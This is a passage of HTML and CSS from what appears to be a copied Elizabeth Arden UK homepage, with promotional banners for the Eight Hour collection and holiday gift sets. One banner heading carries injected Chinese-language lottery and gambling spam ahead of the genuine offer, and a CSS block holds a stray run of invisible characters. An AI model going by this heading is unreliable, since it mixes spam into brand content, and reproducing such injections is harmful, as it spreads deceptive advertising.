  1726. <span>SALE</span>
  1727. </a>
  1728. </li>
  1729. <li class="facial-services top-hide">
  1730. <a class href="index-96.html">
  1731. <span>Beauty Services</span>
  1732. </a>
  1733. </li>
  1734. </ul>
  1735. </div>
  1736.  
  1737. <div class="menu-utility-user">
  1738. <div class="header-checkout hide-desktop">
  1739. <a href="index-97.html" title="Checkout">
  1740. Checkout
  1741. </a>
  1742. </div>
  1743. <div class="customerservice hide-desktop">
  1744. <a href="index-98.html" title="Help">
  1745. Help
  1746. </a>
  1747. </div>
  1748. <div class="user-login">
  1749. <div class="user-login ">
  1750. <ul>
  1751. <li>
  1752. <a class="null" href="index-99.html" title="Sign In">Sign In</a>
  1753. /
  1754. <a class="null" href="index-100.html" title="Register">Register</a>
  1755. </li>
  1756. </ul>
  1757. </div>
  1758. </div>
  1759. <div class="stores">
  1760. <a href="index-101.html" title="Store Locator" class="store-loc-com">
  1761. Store Locator
  1762. </a>
  1763. </div>
  1764. <div class="headermainsearch hide-mobile hide-tablet">
  1765. <a href="javascript:void(0)" role="button" aria-pressed="false" title="Activate search dialog" aria-label="Activate search dialog" aria-expanded="false"></a>
  1766. </div>
  1767. </div>
  1768. <div class="navigation-banner-responsive hide-desktop">
  1769. </div>
  1770. </nav>
  1771. <div class="sidecar_overlay hide"></div>
  1772. </div>
  1773. </header>
  1774. <div id="main" role="main">
  1775.  
  1776. <div id="oc"></div>
  1777. <div class="homepage-banner global-slider">
  1778.  
  1779. <div class="home-slot3">
  1780. <div class="free-shipping-bar">
  1781. <p>A little treat for you: <span>Free delivery on all orders</span></p>
  1782. </div>
  1783.  
  1784. <div class="row full-banner hour8-20pct">
  1785. <a aria-label="link to the Ceramide collection" href="index-28.html">
  1786. <picture>
  1787. <source media="(max-width: 767px)" srcset="jpg/58779_8hr_digital_emea_hp_banner_640x572_3.jpg" />
  1788. <source media="(min-width: 768px) and (max-width: 1023px)" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw6378da7d/images/homepage/topbanner/58779_8HR_DIGITAL_EMEA_HP_Banner_768x528_3.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw8195175c/images/homepage/topbanner/58779_8HR_DIGITAL_EMEA_HP_Banner_1536x1056_3.jpg 2x" />
  1789. <img alt="20% OFF" src="jpg/58779_8hr_digital_emea_hp_banner_1200x500_3.jpg" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw44a0ad0f/images/homepage/topbanner/58779_8HR_DIGITAL_EMEA_HP_Banner_1200x500_3.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw9e0fd6ee/images/homepage/topbanner/58779_8HR_DIGITAL_EMEA_HP_Banner_2400x1000_3.jpg 2x" />
  1790. </picture>
  1791. </a>
  1792. <div class="banner-message" id="offer">
  1793. <img alt="20% OFF" src="svg/promo-20off-blk.svg" class="img-logo" />
  1794. <p>Eight Hour® Collection*</p>
  1795. <p>Discover the multi-tasking, awarding-winning Eight Hour® Collection!</p>
  1796. <p class="legal">*Automatically added at checkout</p>
  1797. <div class="button">
  1798. <a href="index-28.html">SHOP NOW</a>
  1799. </div>
  1800. </div>
  1801. </div>
  1802.  
  1803. <div class="row full-banner free-gwp">
  1804. <a aria-label="link to the Ceramide collection" href="index-28.html">
  1805. <picture>
  1806. <source media="(max-width: 767px)" srcset="jpg/emea_wt_8hr_cer_sub_640x280px.jpg" />
  1807. <source media="(min-width: 768px) and (max-width: 1023px)" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw15485905/images/homepage/topbanner/EMEA_WT_8HR_CER_SUB_768x159px.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwbea2eef6/images/homepage/topbanner/EMEA_WT_8HR_CER_SUB_1536x317px.jpg 2x" />
  1808. <img alt="FREE 3-piece Eight Hour® Gift" src="jpg/emea_wt_8hr_cer_sub_1200x248px.jpg" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwe57f58e1/images/homepage/topbanner/EMEA_WT_8HR_CER_SUB_1200x248px.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw28bddfac/images/homepage/topbanner/EMEA_WT_8HR_CER_SUB_2400x496px.jpg 2x" />
  1809. </picture>
  1810. </a>
  1811. <div class="banner-message" id="offer">
  1812. <h2>澳洲幸运10在线开奖直播官网计划 | 查澳洲幸运10开奖结果官网网址 | 官方开奖直播计划 FREE 3-piece Eight Hour<sup>&reg;</sup> Gift</h2>
  1813. <p>
  1814. When you spend £55+!<sup>*</sup>
  1815. </p>
  1816. <p>Use code: <b>HERO</b></p>
  1817. <div class="button">
  1818. <a href="index-28.html">SHOP NOW</a>
  1819. </div>
  1820. </div>
  1821. </div>
  1822.  
  1823. <div class="row">
  1824. <div class="gifts-tab-container">
  1825.  
  1826. <div class="item">
  1827. <a href="index-16.html">
  1828. <img alt="Shop Skincare" src="jpg/2023-mar-hp-hpo-skincare-d.jpg" />
  1829. <div class="item-name">
  1830. <div class="button">
  1831. <span class="hide-tablet">Shop</span> Skin Care
  1832. </div>
  1833. </div>
  1834. </a>
  1835. </div>
  1836. <div class="item hide-mobile">
  1837. <a href="index-2.html">
  1838. <img alt="Elizabeth Arden makeup products" src="jpg/2023-mar-hp-hpo-best_seller-d.jpg" />
  1839. <div class="item-name">
  1840. <div class="button">
  1841. <span class="hide-tablet">Shop</span> Best Sellers
  1842. </div>
  1843. </div>
  1844. </a>
  1845. </div>
  1846. <div class="item">
  1847. <a href="index-33.html">
  1848. <img alt="White Tea Fragrance" src="jpg/2023-mar-hp-hpo-fragrance-d.jpg" />
  1849. <div class="item-name">
  1850. <div class="button">
  1851. <span class="hide-tablet">Shop</span> Fragrance
  1852. </div>
  1853. </div>
  1854. </a>
  1855. </div>
  1856. </div>
  1857.  
  1858. </div>
  1859.  
  1860. <div class="row full-banner icons-edit">
  1861. <a aria-label="link to the Ceramide collection" href="index-2.html">
  1862. <picture>
  1863. <source media="(max-width: 767px)" srcset="jpg/58492_holiday_2023_digital_emea_hp_banner_640x572.jpg" />
  1864. <source media="(min-width: 768px) and (max-width: 1023px)" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw54fd0b88/images/homepage/topbanner/58492_HOLIDAY_2023_DIGITAL_EMEA_HP_Banner_768_x528.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwd0cdd071/images/homepage/topbanner/58492_HOLIDAY_2023_DIGITAL_EMEA_HP_Banner_1536x1056.jpg 2x" />
  1865. <img alt="THE ICONS EDIT" src="jpg/58492_holiday_2023_digital_emea_hp_banner_1200x500.jpg" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwf9eea536/images/homepage/topbanner/58492_HOLIDAY_2023_DIGITAL_EMEA_HP_Banner_1200x500.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dwee7388f2/images/homepage/topbanner/58492_HOLIDAY_2023_DIGITAL_EMEA_HP_Banner_2400x1000.jpg 2x" />
  1866. </picture>
  1867. </a>
  1868. <div class="banner-message" id="offer">
  1869. <h2>THE ICONS EDIT</h2>
  1870. <p>Meet our <b>NEW</b> 8-piece blockbuster, featuring 6 full-size favourites!<br>
  1871. Yours for only £75 when you spend £45+!*
  1872. </p>
  1873. <div class="button">
  1874. <a href="index-2.html">SHOP NOW</a>
  1875. </div>
  1876. </div>
  1877. <div class="legal">
  1878. <p>*Add to bag at checkout</p>
  1879. </div>
  1880. </div>
  1881.  
  1882. <div class="row full-banner xmas-set">
  1883. <a aria-label="link to the Ceramide collection" href="index-81.html">
  1884. <picture>
  1885. <source media="(max-width: 767px)" srcset="jpg/58496_holiday23_sub_banner_640x280_v1.jpg" />
  1886. <source media="(min-width: 768px) and (max-width: 1023px)" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw21694371/images/homepage/topbanner/58496_Holiday23_sub_banner_768x159_V1.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw69ad6b8e/images/homepage/topbanner/58496_Holiday23_sub_banner_1536x317_V1.jpg 2x" />
  1887. <img alt="GET SET TO CELEBRATE" src="jpg/58496_holiday23_sub_banner_1200x248_v1.jpg" srcset="https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw1f4c6093/images/homepage/topbanner/58496_Holiday23_sub_banner_1200x248_V1.jpg, https://www.elizabetharden.co.uk/on/demandware.static/-/Sites-ElizabethArdenUK-Library/default/dw6bb2ddc7/images/homepage/topbanner/58496_Holiday23_sub_banner_2400x496_V1.jpg 2x" />
  1888. </picture>
  1889. </a>
  1890. <div class="banner-message" id="offer">
  1891. <h2>Shop our <b>NEW</b> Holiday sets!</h2>
  1892. <p>Shop our skincare, makeup and fragrance gift sets. There's something for everyone - including yourself.</p>
  1893. <div class="button">
  1894. <a href="index-81.html">SHOP ALL GIFTS</a>
  1895. </div>
  1896. </div>
  1897. </div>
  1898. </div>
  1899.  
  1900. <style type="text/css">
  1901.    .home-slot3 {
  1902.        width: 100%;
  1903.        position: relative;
  1904.        font-size: 12px;
  1905.    }
  1906.  
  1907.    /* .free-shipping-bar  */
  1908.    .home-slot3 .free-shipping-bar {
  1909.        border-top: 1px solid #ccc;
  1910.        border-bottom: 1px solid #ccc;
  1911.        text-align: center;
  1912.    }
  1913.  
  1914.    .home-slot3 .free-shipping-bar p {
  1915.        color: #000;
  1916.        font-size: 1.083em;
  1917.        text-transform: capitalize;
  1918.        margin: 0.5rem 0;
  1919.    }
  1920.  
  1921.    .home-slot3 .free-shipping-bar p span {
  1922.        font-weight: 500;
  1923.        text-transform: uppercase;
  1924.    }
  1925.  
  1926.    .home-slot3 .row {
  1927.        position: relative;
  1928.    }
  1929.  
  1930.    .home-slot3 a.full-link {
  1931.        position: absolute;
  1932.        width: 100%;
  1933.        height: 100%;
  1934.        z-index: 50;
  1935.        top: 0;
  1936.        left: 0;
  1937.    }
  1938.  
  1939.    .home-slot3 .banner-message {
  1940.        color: #000;
  1941.        background-color: transparent;
  1942.        bottom: inherit;
  1943.    }
  1944.  
  1945.    .home-slot3 .banner-message h2 {
  1946.        text-transform: uppercase;
  1947.        font-size: 2rem;
  1948.        line-height: 1.2em;
  1949.        font-weight: normal;
  1950.    }
  1951.  
  1952.    .home-slot3 .banner-message h3 {
  1953.        font: 1.5em/2em akzidenz-grotesk-extended, sans-serif;
  1954.        text-transform: uppercase;
  1955.        margin: 10px 0 20px;
  1956.    }
  1957.  
  1958.    .home-slot3 .banner-message p {
  1959.        font-size: 1rem;
  1960.        width: 100%;
  1961.        line-height: 1.4em;
  1962.        padding: 0;
  1963.        margin: 0.8rem 0 0;
  1964.        /* font-weight: 300; */
  1965.    }
  1966.  
  1967.    .home-slot3 .full-banner .banner-message p.legal {
  1968.        font-size: 80%;
  1969.        margin: 1.4rem 0 0;
  1970.        font-size: 0.625rem;
  1971.    }
  1972.  
  1973.    .home-slot3 .banner-message .button {
  1974.        border: 1px solid #000;
  1975.        background-color: transparent;
  1976.        position: relative;
  1977.        z-index: 51;
  1978.        padding: 10px 20px 9px;
  1979.        font-size: 14px;
  1980.        text-transform: uppercase;
  1981.        margin: 1.563em 0 0;
  1982.    }
  1983.  
  1984.    .home-slot3 .banner-message .button a {
  1985.        color: #000;
  1986.    }
  1987.  
  1988.    .home-slot3 .banner-message p a {
  1989.        text-decoration: underline;
  1990.    }
  1991.  
  1992.    .allCaps {
  1993.        text-transform: uppercase;
  1994.    }
  1995.  
  1996.    .home-slot3 .banner-message sup {
  1997.        top: -0.7em;
  1998.        font-size: 55%;
  1999.    }
  2000.  
  2001.    .home-slot3 .row {
  2002.        margin: 10px 0;
  2003.    }
  2004.  
  2005.    .home-slot3 .row.top-message {
  2006.        margin: 0;
  2007.    }
  2008.  
  2009.    .home-slot3 .row:last-of-type {
  2010.        margin-bottom: 0;
  2011.    }
  2012.  
  2013.    .home-slot3 .full-banner {
  2014.        position: relative;
  2015.    }
  2016.  
  2017.    .home-slot3 .full-banner .banner-message {
  2018.        position: absolute;
  2019.        transform: translateY(-50%);
  2020.        top: 50%;
  2021.        width: 24rem;
  2022.        text-align: left;
  2023.    }
  2024.  
  2025.  
  2026.    .home-slot3 .full-banner div.legal {
  2027.        transform: translateY(-50%);
  2028.        position: absolute;
  2029.        left: 7%;
  2030.        bottom: 1%;
  2031.        text-align: left;
  2032.        font-size: 0.625rem;
  2033.    }
  2034.  
  2035.    /* seasonal-gifts */
  2036.    /* change here to move .seasonal-gifts copy */
  2037.    .home-slot3 .full-banner.seasonal-gifts .banner-message {
  2038.        left: 10%;
  2039.        width: 26rem;
  2040.    }
  2041.  
  2042.    .home-slot3 .full-banner.seasonal-gifts .banner-message p {
  2043.        font-size: 1rem;
  2044.    }
  2045.  
  2046.    /* gifts-tab-container */
  2047.  
  2048.    .gifts-tab-container {
  2049.        display: -webkit-flex;
  2050.        display: flex;
  2051.        -webkit-flex-direction: row;
  2052.        flex-direction: row;
  2053.        text-align: left;
  2054.        margin: 50px auto 50px;
  2055.        flex-flow: nowrap;
  2056.        align-self: flex-start;
  2057.        justify-content: center;
  2058.    }
  2059.  
  2060.    .gifts-tab-container .item {
  2061.        width: 26%;
  2062.        text-align: center;
  2063.        padding-bottom: 10px;
  2064.    }
  2065.  
  2066.    .gifts-tab-container .item .item-name p {
  2067.        text-align: center;
  2068.        font-size: 16px;
  2069.        line-height: 20px;
  2070.        margin: 20px auto 0;
  2071.        text-transform: uppercase;
  2072.    }
  2073.  
  2074.    .gifts-tab-container .item:nth-of-type(2n) {
  2075.        margin: 0 40px;
  2076.    }
  2077.  
  2078.    .gifts-tab-container .item .item-name {
  2079.        margin-top: 20px;
  2080.    }
  2081.  
  2082.    .gifts-tab-container .item .button {
  2083.        background-color: transparent;
  2084.        border-color: #000;
  2085.        color: #000;
  2086.    }
  2087.  
  2088.    .gifts-tab-container .item .button:hover {
  2089.        color: #000;
  2090.    }
  2091.  
  2092.    @media screen and (min-width: 1024px) and (max-width: 1199px) {
  2093.        .home-slot3 .row:first-of-type {
  2094.            margin: 0;
  2095.        }
  2096.  
  2097.        .home-slot3 .full-banner .banner-message {
  2098.            width: 60%;
  2099.        }
  2100.  
  2101.  
  2102.        /* .sub-banner */
  2103.        /* change here to move .sub-banner copy */
  2104.        .home-slot3 .full-banner.sub-banner .banner-message {
  2105.            left: 5%;
  2106.        }
  2107.  
  2108.    }
  2109.  
  2110.    @media screen and (max-width: 1023px) {
  2111.        .global-slider {
  2112.            display: inherit;
  2113.        }
  2114.  
  2115.        .home-slot3 .full-banner .banner-message,
  2116.        .home-slot3 .full-banner div.legal {
  2117.            position: relative;
  2118.            top: 0;
  2119.            transform: none;
  2120.            left: 0;
  2121.        }
  2122.  
  2123.    }
  2124.  
  2125.    @media screen and (min-width: 768px) and (max-width: 1023px) {
  2126.        .home-slot3 .row {
  2127.            margin: 10px 0;
  2128.        }
  2129.  
  2130.        .home-slot3 .row:first-of-type {
  2131.            margin: 0;
  2132.        }
  2133.  
  2134.        .home-slot3 .row:last-of-type {
  2135.            margin: 0 0 30px;
  2136.        }
  2137.  
  2138.        .home-slot3 .full-banner .banner-message {
  2139.            width: 50%;
  2140.            color: #000;
  2141.        }
  2142.  
  2143.        .home-slot3 .banner-message h2 {
  2144.            font-size: 1.75rem;
  2145.        }
  2146.  
  2147.        .home-slot3 .full-banner.offer-1 .banner-message p,
  2148.        .home-slot3 .full-banner.seasonal-gifts .banner-message p {
  2149.            font-size: 0.938rem;
  2150.        }
  2151.  
  2152.        .home-slot3 .full-banner.seasonal-gifts .banner-message,
  2153.        .home-slot3 .full-banner.offer-1 .banner-message {
  2154.            width: 31rem;
  2155.            left: 0;
  2156.            margin: 40px auto;
  2157.            text-align: center;
  2158.        }
  2159.  
  2160.        ​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​
  2161.  
  2162.        /* .gifts-tab-container */
  2163.        .gifts-tab-container .item {
  2164.            width: 28%;
  2165.        }
  2166.    }
  2167.  
  2168.    @media screen and (max-width: 767px) {
  2169.        .home-slot3 {
  2170.            display: block;
  2171.        }
  2172.  
  2173.        .home-slot3 .row:first-of-type,
  2174.        .home-slot3 .row {
  2175.            margin: 0;
  2176.        }
  2177.  
  2178.        .pt_storefront .watch-video {
  2179.            float: none;
  2180.            font-size: inherit;
  2181.        }
  2182.  
  2183.        .home-slot3 .full-banner .banner-message {
  2184.            width: 80%;
  2185.            margin: 20px auto 25px;
  2186.            text-align: center;
  2187.            color: #000;
  2188.        }
  2189.  
  2190.        .home-slot3 .free-shipping-bar p span {
  2191.            display: block;
  2192.        }
  2193.  
  2194.        .home-slot3 .banner-message,
  2195.        .watch-video-image {
  2196.            display: block;
  2197.            width: 100%;
  2198.        }
  2199.  
  2200.        .home-slot3 .banner-message h2 {
  2201.            font-size: 1.5rem;
  2202.            line-height: 1em;
  2203.            width: 100%;
  2204.            margin: 0 0 10px;
  2205.        }
  2206.  
  2207.        .home-slot3 .banner-message h3.subheader,
  2208.        .home-slot3 .banner-message h4 {
  2209.            font-size: 1.25rem;
  2210.            width: 100%;
  2211.            line-height: 20px;
  2212.            color: #000;
  2213.        }
  2214.  
  2215.        .home-slot3 .banner-message {
  2216.            top: 0;
  2217.            left: 0;
  2218.            position: static;
  2219.            text-align: center;
  2220.            width: 100%;
  2221.            transform: none;
  2222.            padding-top: 0;
  2223.        }
  2224.  
  2225.        .home-slot3 .banner-message p {
  2226.            font-size: 0.875rem;
  2227.            line-height: inherit;
  2228.        }
  2229.  
  2230.        /* .home-slot3 .banner-message .button {
  2231.            font-size: 1.083em;
  2232.            padding: 10px 30px 9px;
  2233.            margin-top: 1rem;
  2234.        } */
  2235.  
  2236.        .home-slot3 .full-banner .banner-message,
  2237.        .home-slot3 .full-banner.sub-banner .banner-message,
  2238.        .home-slot3 .full-banner div.legal {
  2239.            position: relative;
  2240.            top: 0;
  2241.            transform: none;
  2242.            left: 0;
  2243.            width: 90%;
  2244.            margin: 20px auto 25px;
  2245.            text-align: center;
  2246.        }
  2247.  
  2248.        /* .gifts-tab-container */
  2249.        .gifts-tab-container {
  2250.            margin: 0 auto 2.5em;
  2251.            flex-flow: wrap;
  2252.            align-self: flex-start;
  2253.            justify-content: center;
  2254.        }
  2255.  
  2256.        .gifts-tab-container .item {
  2257.            width: 45%;
  2258.            margin: 10px auto 10px;
  2259.        }
  2260.  
  2261.        .gifts-tab-container .item:nth-of-type(2n) {
  2262.            margin: 10px auto 10px;
  2263.        }
  2264.  
  2265.        .gifts-tab-container .item:last-of-type {
  2266.            margin: 10px auto 10px;
  2267.        }
  2268.  
  2269.        .gifts-tab-container .item p {
  2270.            margin-bottom: 20px;
  2271.        }
  2272.  
  2273.        .gifts-tab-container .item .item-name .button span {
  2274.            display: block;
  2275.        }
  2276.  
  2277.        .gifts-tab-container .item .item-name p {
  2278.            font-size: 18px;
  2279.        }
  2280.    }
  2281.  
  2282.    @media screen and (min-width: 480px) and (max-width: 767px) {
  2283.  
  2284.        .watch-video-image .hide-lg-mobile,
  2285.        .home-slot3 .banner-message .hide-lg-mobile {
  2286.            display: none;
  2287.        }
  2288.    }
  2289.  
  2290.    @media screen and (max-width: 479px) {
  2291.  
  2292.        .watch-video-image .hide-sm-mobile,
  2293.        .home-slot3 .banner-message .hide-sm-mobile,
  2294.        .hide-sm-mobile {
  2295.            display: none;
  2296.        }
  2297.  
  2298.    }
  2299. </style>
  2300.  
  2301. <style type="text/css">
  2302.    .home-slot3 .free-gwp .banner-message {
  2303.        left: 5%;
  2304.        transform: translateY(-50%);
  2305.        width: 26rem;
  2306.        text-align: left;
  2307.        margin: 0;
  2308.        /* color: #fff; */
  2309.    }
  2310.  
  2311.    .home-slot3 .free-gwp .banner-message h2 {
  2312.        text-transform: inherit;
  2313.        font-size: 1.5rem;
  2314.    }
  2315.  
  2316.    .home-slot3 .free-gwp .banner-message h2 span {
  2317.        font-size: 90%;
  2318.    }
  2319.  
  2320.    .home-slot3 .free-gwp .banner-message p {
  2321.        margin: 0.5rem 0 0;
  2322.    }
  2323.  
  2324.    .home-slot3 .free-gwp .banner-message p.preheader {
  2325.        margin: 0 0 0rem;
  2326.    }
  2327.  
  2328.    .home-slot3 .free-gwp .banner-message .button {
  2329.        margin: 1em 0 0;
  2330.    }
  2331.  
  2332.    .home-slot3 .free-gwp .banner-message img.img-logo {
  2333.        width: 50%;
  2334.        margin: 0 auto;
  2335.    }
  2336.  
  2337.    @media screen and (min-width: 1024px) and (max-width: 1199px) {
  2338.  
  2339.        /* .home-slot3 .free-gwp .banner-message {
  2340.            width: 24rem;
  2341.        } */
  2342.    }
  2343.  
  2344.    @media screen and (max-width: 1023px) {
  2345.  
  2346.  
  2347.        .home-slot3 .free-gwp .banner-message h1 {
  2348.            text-transform: uppercase;
  2349.            font-size: 2.5rem;
  2350.            margin-bottom: 0;
  2351.        }
  2352.  
  2353.        .home-slot3 .free-gwp .banner-message h2 {
  2354.            font-size: 1.5rem;
  2355.        }
  2356.  
  2357.        .home-slot3 .free-gwp .legal-footnote {
  2358.            position: relative;
  2359.            text-align: center;
  2360.            margin: 2rem auto 1rem;
  2361.        }
  2362.  
  2363.        .home-slot3 .free-gwp .banner-message {
  2364.            color: #000;
  2365.            position: absolute;
  2366.            top: 50%;
  2367.        }
  2368.  
  2369.        .home-slot3 .free-gwp .banner-message .button {
  2370.            border: 1px solid #000;
  2371.        }
  2372.  
  2373.        .home-slot3 .free-gwp .banner-message .button a {
  2374.            color: #000;
  2375.        }
  2376.    }
  2377.  
  2378.    @media screen and (min-width: 768px) and (max-width: 1023px) {
  2379.  
  2380.  
  2381.        .home-slot3 .free-gwp .banner-message {
  2382.            position: relative;
  2383.            top: 0;
  2384.            transform: none;
  2385.            left: 0;
  2386.            width: 90%;
  2387.            margin: 20px auto 25px;
  2388.            text-align: center;
  2389.        }
  2390.  
  2391.        .home-slot3 .free-gwp .banner-message img.img-logo {
  2392.            width: 30%;
  2393.            /* width: 180px; */
  2394.        }
  2395.  
  2396.    }
  2397.  
  2398.    @media screen and (max-width: 767px) {
  2399.  
  2400.        .home-slot3 .free-gwp .banner-message p {
  2401.            font-size: 1.333em;
  2402.            line-height: inherit;
  2403.        }
  2404.  
  2405.        .home-slot3 .free-gwp .banner-message {
  2406.            position: relative;
  2407.            top: 0;
  2408.            transform: none;
  2409.            left: 0;
  2410.            width: 90%;
  2411.            margin: 20px auto 25px;
  2412.            text-align: center;
  2413.        }
  2414.  
  2415.        .home-slot3 .free-gwp .banner-message h1 {
  2416.            text-transform: uppercase;
  2417.            font-size: 1.25rem;
  2418.            line-height: 1em;
  2419.            margin-bottom: .5rem;
  2420.        }
  2421.  
  2422.        .home-slot3 .free-gwp .banner-message img.img-logo {
  2423.            width: 35%;
  2424.            ;
  2425.        }
  2426.  
  2427.        .home-slot3 .free-gwp .banner-message {
  2428.            color: #000;
  2429.        }
  2430.  
  2431.        .home-slot3 .free-gwp .banner-message .button {
  2432.            border: 1px solid #000;
  2433.        }
  2434.  
  2435.        .home-slot3 .free-gwp .banner-message .button a {
  2436.            color: #000;
  2437.        }
  2438.  
  2439.    }
  2440.  
  2441.    @media screen and (min-width: 480px) and (max-width: 767px) {}
  2442.  
  2443.    @media screen and (max-width: 479px) {}
  2444. </style>
  2445.  
  2446. <style type="text/css">
  2447.    .home-slot3 .icons-edit .banner-message {
  2448.        left: 5%;
  2449.        transform: translateY(-50%);
  2450.        width: 25rem;
  2451.        text-align: center;
  2452.        margin: inherit;
  2453.        /* color: #fff; */
  2454.        margin: 0;
  2455.        /* left: inherit; */
  2456.    }
  2457.  
  2458.    .home-slot3 .icons-edit div.legal {
  2459.        left: 5%;
  2460.        transform: translateY(-50%);
  2461.        position: absolute;
  2462.        width: 25rem;
  2463.        text-align: center;
  2464.        font-size: 0.625rem;
  2465.        bottom: 1%;
  2466.        top: inherit;
  2467.    }
  2468.  
  2469.    .home-slot3 .icons-edit .banner-message h2 {
  2470.        font-size: 2.5rem;
  2471.    }
  2472.  
  2473.    .home-slot3 .icons-edit .banner-message h2 span {
  2474.        text-transform: none;
  2475.        font-size: 70%;
  2476.        font-style: italic;
  2477.    }
  2478.  
  2479.    .home-slot3 .icons-edit .banner-message p.preheader {
  2480.        margin: 0 0 0.8rem;
  2481.    }
  2482.  
  2483.    .home-slot3 .icons-edit .banner-message .button {
  2484.        margin: 0.8rem 0 0;
  2485.    }
  2486.  
  2487.    .home-slot3 .icons-edit .banner-message img.img-logo {
  2488.        width: 50%;
  2489.        margin: 0 auto;
  2490.    }
  2491.  
  2492.    @media screen and (min-width: 1024px) and (max-width: 1199px) {
  2493.  
  2494.        /* .home-slot3 .icons-edit .banner-message {
  2495.            left: 5%;
  2496.            width: 22rem;
  2497.        } */
  2498.    }
  2499.  
  2500.    @media screen and (max-width: 1023px) {
  2501.  
  2502.  
  2503.        .home-slot3 .icons-edit .banner-message h1 {
  2504.            text-transform: uppercase;
  2505.            font-size: 2.5rem;
  2506.            margin-bottom: 0;
  2507.        }
  2508.  
  2509.        .home-slot3 .icons-edit .banner-message h2 {
  2510.            font-size: 1.75rem;
  2511.        }
  2512.  
  2513.        .home-slot3 .icons-edit .legal-footnote {
  2514.            position: relative;
  2515.            text-align: center;
  2516.            margin: 2rem auto 1rem;
  2517.        }
  2518.  
  2519.        .home-slot3 .icons-edit .banner-message {
  2520.            color: #000;
  2521.            position: absolute;
  2522.            top: 50%;
  2523.        }
  2524.  
  2525.  
  2526.        .home-slot3 .icons-edit .banner-message .button {
  2527.            border: 1px solid #000;
  2528.        }
  2529.  
  2530.        .home-slot3 .icons-edit .banner-message .button a {
  2531.            color: #000;
  2532.        }
  2533.    }
  2534.  
  2535.    @media screen and (min-width: 768px) and (max-width: 1023px) {
  2536.  
  2537.  
  2538.        .home-slot3 .icons-edit .banner-message, .home-slot3 .icons-edit div.legal {
  2539.            width: 22rem;
  2540.            text-align: left;
  2541.        }
  2542.  
  2543.        /* .home-slot3 .icons-edit .banner-message {
  2544.            position: relative;
  2545.            top: 0;
  2546.            transform: none;
  2547.            left: 0;
  2548.            width: 90%;
  2549.            margin: 20px auto 25px;
  2550.            text-align: center;
  2551.        } */
  2552.  
  2553.        /* .home-slot3 .icons-edit div.legal {
  2554.            position: inherit;
  2555.            top: inherit;
  2556.            transform: inherit;
  2557.            left: inherit;
  2558.            text-align: center;
  2559.            width: 100%;
  2560.            margin-bottom: 20px;
  2561.        } */
  2562.  
  2563.        .home-slot3 .icons-edit .banner-message img.img-logo {
  2564.            width: 30%;
  2565.            /* width: 180px; */
  2566.        }
  2567.  
  2568.    }
  2569.  
  2570.    @media screen and (max-width: 767px) {
  2571.  
  2572.        .home-slot3 .icons-edit .banner-message p {
  2573.            font-size: 1.333em;
  2574.            line-height: inherit;
  2575.        }
  2576.  
  2577.        .home-slot3 .icons-edit .banner-message {
  2578.            position: relative;
  2579.            top: 0;
  2580.            transform: none;
  2581.            left: 0;
  2582.            width: 90%;
  2583.            margin: 20px auto 25px;
  2584.            text-align: center;
  2585.        }
  2586.  
  2587.        .home-slot3 .icons-edit div.legal {
  2588.            position: inherit;
  2589.            top: inherit;
  2590.            transform: inherit;
  2591.            left: inherit;
  2592.            text-align: center;
  2593.            width: 100%;
  2594.            margin-bottom: 20px;
  2595.        }
  2596.  
  2597.        .home-slot3 .icons-edit .banner-message h1 {
  2598.            text-transform: uppercase;
  2599.            font-size: 1.25rem;
  2600.            line-height: 1em;
  2601.            margin-bottom: .5rem;
  2602.        }
  2603.  
  2604.        .home-slot3 .icons-edit .banner-message h2 {
  2605.            font-size: 1.5rem;
  2606.        }
  2607.  
  2608.        .home-slot3 .icons-edit .banner-message img.img-logo {
  2609.            width: 35%;
  2610.            ;
  2611.        }
  2612.  
  2613.        .home-slot3 .icons-edit .banner-message {
  2614.            color: #000;
  2615.        }
  2616.  
  2617.        .home-slot3 .icons-edit .banner-message .button {
  2618.            border: 1px solid #000;
  2619.        }
  2620.  
  2621.        .home-slot3 .icons-edit .banner-message .button a {
  2622.            color: #000;
  2623.        }
  2624.  
  2625.    }
  2626.  
  2627.    @media screen and (min-width: 480px) and (max-width: 767px) {}
  2628.  
  2629.    @media screen and (max-width: 479px) {}
  2630. </style>
  2631.  
  2632. <style type="text/css">
  2633.    .home-slot3 .xmas-set .banner-message {
  2634.        left: 5%;
  2635.        transform: translateY(-50%);
  2636.        width: 30rem;
  2637.        text-align: left;
  2638.        margin: 0;
  2639.        /* color: #fff; */
  2640.    }
  2641.  
  2642.    .home-slot3 .xmas-set .banner-message h2 {
  2643.        text-transform: inherit;
  2644.        font-size: 1.5rem;
  2645.    }
  2646.  
  2647.    .home-slot3 .xmas-set .banner-message h2 span {
  2648.        font-size: 90%;
  2649.    }
  2650.  
  2651.    .home-slot3 .xmas-set .banner-message p {
  2652.        margin: 0.5rem 0 0;
  2653.    }
  2654.  
  2655.    .home-slot3 .xmas-set .banner-message p.preheader {
  2656.        margin: 0 0 0rem;
  2657.    }
  2658.  
  2659.    .home-slot3 .xmas-set .banner-message .button {
  2660.        margin: 1em 0 0;
  2661.    }
  2662.  
  2663.    .home-slot3 .xmas-set .banner-message img.img-logo {
  2664.        width: 50%;
  2665.        margin: 0 auto;
  2666.    }
